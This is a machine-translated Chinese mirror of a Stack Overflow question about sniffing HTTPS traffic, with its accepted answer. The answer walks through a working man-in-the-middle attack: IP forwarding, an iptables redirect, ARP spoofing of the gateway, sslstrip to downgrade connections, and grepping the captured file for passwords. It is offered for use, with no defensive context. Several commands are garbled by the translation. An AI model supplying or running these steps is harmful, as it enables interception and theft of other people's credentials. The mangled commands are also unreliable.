首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >HTTPS / SSL嗅探

HTTPS / SSL嗅探
EN

Stack Overflow用户
提问于 2012-08-07 13:50:15
回答 1查看 853关注 0票数 1

我使用Backtrack5作为这个..but是卡住的,...i无法获得我想要的数据,我使用EttercapSSL带来实现这个.

这里有人知道怎么做吗?

EN

回答 1

Stack Overflow用户

回答已采纳

发布于 2012-08-14 10:59:53

看看你是怎么做的,但对我来说,ettercap( gui)一直都是垃圾。我建议跳过ettercap,除非您想要简单的DNS欺骗,然后选择另一条路线。

让我给您一些步骤,从设置您的iptable为这次攻击(人在中间,阿米尔)和启用ip_forward(ing)。

回声"1“>/proc/sys/net/ipv4 4/ip_forward

iptables -t nat -A PREROUTING -p tcp -目的端口80 -j重定向到端口1337 (可以选择要将它们发送到的任何端口)

现在要成为中间的人:这里我们使用arpspoof: arpspoof -i wlan0(或任何接口) 192.168.1.X(X是网关,通常是.1或.255)

然后使用SSLStrip,您可以继续使用./sslstrip.py -1 1337 -w文件名(1337是前面的端口,文件名是您想转储数据的任何文件名)。

猫文件名(从前面),甚至管道\ grep“密码”或任何你嗅探的东西,或者你可以转储一切。该文件将被捕获/剥离的https数据填充。

票数 2
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/11847475

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档